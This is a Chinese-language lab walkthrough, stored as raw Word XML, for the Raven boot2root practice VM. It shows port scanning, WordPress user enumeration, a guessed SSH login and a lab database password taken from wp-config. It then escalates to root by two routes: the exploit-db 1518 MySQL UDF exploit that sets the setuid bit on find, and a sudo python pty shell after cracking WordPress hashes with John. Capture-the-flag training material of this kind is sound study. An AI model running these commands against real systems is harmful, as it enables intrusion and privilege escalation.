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1F40A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021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>靶机渗透之Raven实战</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934D417" w14:textId="79E56CDC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挑战靶机是Raven，这是一个boot2root的靶机环境，有两种方法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可以提权到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root</w:t>
      </w:r>
      <w:r w:rsidR="00F92EA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4021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我将会对这两种方法进行演示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB93A03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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>目录（方法一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF3861D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· </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>端口扫描和IP发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CFE7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访问80端口，发现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cms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是WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C208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wpscan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扫描网站发现两个用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629E04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暴力破解22端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E8EFD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LinEnum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脚本枚举活动进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B104F8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发现运行MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8FE03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从wp-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config.php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文件获取数据库用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5837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使用MySQL创建一个UDF（用户自定义函数）动态库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5260C7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将UDF exp编译成共享库程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F576A4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在靶机中运行UDF共享库程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794807A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设置粘滞位为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find”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711B6FE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获取root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5ECB1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读取flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176018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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>目录（方法二）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725F0AA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前面7步跟方法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一样获取shell，访问MySQL。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E61F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</w:t>
      </w:r>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 在MySQL中，发现所有数据库和表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250BBD2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读取WordPress数据库中的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wp_users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表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42585C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</w:t>
      </w:r>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 从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wp_users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表中获取hash值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724478A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破解hash，获取其他用户的shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D526C3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</w:t>
      </w:r>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 发现Python不需要root权限也可以运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573CD1FE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 xml:space="preserve">使用Python生成root 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tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5350DE3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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>读取flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A58E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两种思路都介绍完了，现在就开始实战了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE22741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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108DA6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netdiscover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发现网络中存活的主机并获取该靶机的IP地址，在本文中，靶机IP是192.168.1.102.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB08481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5906B8" wp14:editId="118541DE">
            <wp:extent cx="5231958" cy="1367155"/>
            <wp:effectExtent l="0" t="0" r="6985" b="4445"/>
            <wp:docPr id="1" name="图片 1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7" cy="13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1AD6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nmap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扫描靶机，发现开放了22,80和111端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768A5E1A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0EFC46" wp14:editId="4B47CDEC">
            <wp:extent cx="5201787" cy="3347499"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2" name="图片 2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70" cy="342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0DE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访问一下80端口，发现了下图中Raven安全的网址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6ED2C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38EB1A" wp14:editId="6FEB23A9">
            <wp:extent cx="5191125" cy="3132814"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3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42" cy="316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88CC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在网站右上角，发现有个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blog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标签，访问一下就看到如下页面，这很显然是一个WordPress CMS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BDF5D1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FEDBFB" wp14:editId="746DE9CB">
            <wp:extent cx="5179695" cy="3514477"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="4" name="图片 4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89" cy="353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2892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既然是WordPress，那就先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wpscan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走一波，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD341D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wpscan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--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http://192.168.1.102/wordpress/ --wp-content-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-ep -et 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eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31C53CE3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85EC00" wp14:editId="25C301FB">
            <wp:extent cx="5219700" cy="2349610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5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22" cy="23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B012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扫描结果中返回了靶机中的两个用户Michael和Steven。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66189A0C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59DE6" wp14:editId="0814C9ED">
            <wp:extent cx="5238440" cy="2369489"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="6" name="图片 6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66" cy="24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B3C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现在，在80端口上好像无法进一步突破了，所以我们转向22端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F7E9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我们可以尝试一下，用户名和密码使用相同的单词，在这里我们就使用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michael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，密码也是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michael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，没想到竟然上去了。然后我们切换到/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目录下，然后需要上传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LinEnum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脚本，这个脚本可以枚举很多基本和高级的Linux详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18EBA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这个脚本在我们攻击机的根目录下，我们可以在靶机上使用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来下载，我的攻击机的IP地址是192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D165736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michael@192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1CAD21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cd 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</w:p>
    <w:p w14:paraId="202A7DDE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http://192.168.1.109/LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B6DF1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777 LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3225642F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8FB708" wp14:editId="6FEB1CE2">
            <wp:extent cx="5166995" cy="4444411"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7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79" cy="45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A4D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下载后，我们修改脚本的执行权限，然后执行脚本，发现靶机上跑着MySQL服务（3306端口开放）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940B3E5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1A91C9" wp14:editId="695DED78">
            <wp:extent cx="5140131" cy="2838616"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8" name="图片 8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07" cy="286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55EC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我们发现了MySQL-Exploit-Remote-Root-Code-Execution-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Privesc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漏洞，该漏洞可以执行远程代码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并提权到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root。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E710C9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lastRenderedPageBreak/>
        <w:t>更多信息请参考：https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B9E87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B67844" wp14:editId="66B3266B">
            <wp:extent cx="5215533" cy="2775005"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="9" name="图片 9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81" cy="279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5AA9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切换当前目录到/var/www/html/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wordpress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目录下，并查找wp-config文件，这个文件会存储着MySQL数据库的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0BF962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28FC8C" wp14:editId="27C0BA95">
            <wp:extent cx="5096183" cy="3582062"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="图片 10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03" cy="36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055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果不其然，密码找到了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B87AD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R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CCE89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06C5FD" wp14:editId="00BD338E">
            <wp:extent cx="5116195" cy="2826688"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="11" name="图片 11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52" cy="28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E7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接下来，我们搜索一下UDF动态库exp，在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expolit-db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中该exp是1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137AE5E7" w14:textId="77777777" w:rsidR="004021B3" w:rsidRPr="004021B3" w:rsidRDefault="006868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tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="004021B3" w:rsidRPr="004021B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https://www.exploit-db.com/exploits/1518/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CD28B15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69D525" wp14:editId="083C0261">
            <wp:extent cx="5056505" cy="4746928"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12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91" cy="477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9F5C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lastRenderedPageBreak/>
        <w:t>先将原始的C语言代码编译成.so文件，然后再上传到靶机中运行来利用这个MySQL漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA47AA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第一步是编译。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001C6D6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searchsploit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–m 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35D0E3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gcc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-g -shared -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Wl,-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soname,1518.so -o 1518.so 1518.c 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lc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E9B89CD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969B6A" wp14:editId="68BECACC">
            <wp:extent cx="4902007" cy="2465070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13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36" cy="24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68B2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编译完成后，将该文件放在本地服务器的根目录下，然后在靶机上切换到/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目录下，再使用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来下载这个.so文件，因为/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目录是全局可读可写的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37774BBB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searchsploit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–m 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A12151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gcc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-g -shared -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Wl,-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soname,1518.so -o 1518.so 1518.c -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lc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E881F35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&lt;输入密码&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721F49E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获取到MySQL shell之后，我们开始利用刚才发现的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB22C5D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use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A5CB2E4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现在，我们创建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一个表叫“foo”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，在这个表中插入1518.so文件的链接路径，也就是/tmp/1518.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5147BD21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我们再将相同的文件写入到/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/plugin目录中（因为它存在漏洞）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F6ED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接下来是最重要的一步，我们创建一个UDF函数，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do_system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，它会调用实现该函数的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBC508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因此，我们调用代码“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u+s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/bin/find”来设置粘滞位为“find”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482B412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create table 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foo(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line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05431386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lastRenderedPageBreak/>
        <w:t>insert into foo values(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load_file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('/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/1518.so'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950AE41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select * from foo into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dumpfile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'/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/plugin/1518.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739E4C2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create function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do_system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returns integer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soname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'1518.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309A4BD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select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do_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system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chmod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u+s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/bin/find');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401E4B0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90BF6E" wp14:editId="6D2E6A8A">
            <wp:extent cx="4862195" cy="5927698"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14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82" cy="59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21D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现在，我们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切回到/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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目录，然后使用“find”程序来执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2BA4E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touch raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A223D2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find raj –exec "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whoami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" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4244EED4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find raj –exec "/bin/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sh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" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B160D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cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9E52A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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D393A13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cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775BF1F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C6DA63" wp14:editId="493776C1">
            <wp:extent cx="4861919" cy="5589905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15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165" cy="560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E865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不过，我们的任务是要找到所有的flags，我们可以使用下面这个命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD4642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find / -name "flag*.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066D041C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A6CBC6" wp14:editId="51E42333">
            <wp:extent cx="4210050" cy="1113155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="图片 16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3C08" w14:textId="77777777" w:rsidR="002E5A3E" w:rsidRDefault="002E5A3E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30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F434725" w14:textId="6FD3A260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方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D06EB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获取MySQL shell的方法跟方法</w:t>
      </w:r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一样，接下来使用第二种方法来提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF5337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查看所有数据库，然后查看数据库WordPress中wp-users表中的所有数据，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB849EA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show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F83CD1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use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wordpress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B422193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show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EE3CA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select * from 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wp_users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D4578A0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27452D" wp14:editId="621FD0D9">
            <wp:extent cx="4644390" cy="5223052"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="17" name="图片 17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63" cy="52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6D77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我们发现了两个用户和其密码hash值，不过Michael用户的密码我们已经知道了，所以这里我们只需要破解一下Steven的密码，我们可以使用John the ripper这款工具来破解，把hash值粘贴到一个txt文件中，命名为hash，然后就可以直接破解了，如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4131D0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2F209B" wp14:editId="2D02D139">
            <wp:extent cx="8134350" cy="1475105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="图片 18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F29F" w14:textId="77777777" w:rsidR="004021B3" w:rsidRPr="004021B3" w:rsidRDefault="004021B3" w:rsidP="004021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既然知道了密码，我们就可以登录到Steven的shell的，运行一下</w:t>
      </w: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 xml:space="preserve"> -l命令，发现Python不需要root权限就可以执行，那我们就可以直接利用Python来生成一个root shell了，输入id查看即可，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708937B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steven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0EA7BC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–l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404586CD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21B3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 python –c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004021B3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46514675" w14:textId="77777777" w:rsidR="004021B3" w:rsidRPr="004021B3" w:rsidRDefault="004021B3" w:rsidP="004021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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3708C421" w14:textId="77777777" w:rsidR="004021B3" w:rsidRPr="004021B3" w:rsidRDefault="004021B3" w:rsidP="004021B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1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21354C" wp14:editId="75068A49">
            <wp:extent cx="6782435" cy="2115185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="靶机渗透之Raven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靶机渗透之Raven实战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F9F5" w14:textId="77777777" w:rsidR="00A074B3" w:rsidRDefault="00A074B3"/>
    <w:sectPr w:rsidR="00A074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2ADB4A" w14:textId="77777777" w:rsidR="006868B3" w:rsidRDefault="006868B3" w:rsidP="00801081">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2FA9A1AC" w14:textId="77777777" w:rsidR="006868B3" w:rsidRDefault="006868B3" w:rsidP="00801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D1BA1" w14:textId="77777777" w:rsidR="006868B3" w:rsidRDefault="006868B3" w:rsidP="00801081">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1281F81C" w14:textId="77777777" w:rsidR="006868B3" w:rsidRDefault="006868B3" w:rsidP="008010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A0"/>
    <w:rsid w:val="002E5A3E"/>
    <w:rsid w:val="004021B3"/>
    <w:rsid w:val="006868B3"/>
    <w:rsid w:val="00801081"/>
    <w:rsid w:val="00A074B3"/>
    <w:rsid w:val="00A84772"/>
    <w:rsid w:val="00E616A0"/>
    <w:rsid w:val="00F9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2C4B0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C55DDBB6-A58B-4706-A0A5-84C08DB01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0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52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7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exploit-db.com/exploits/1518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949947516@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>949947516@qq.com</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-20T05:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-13T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>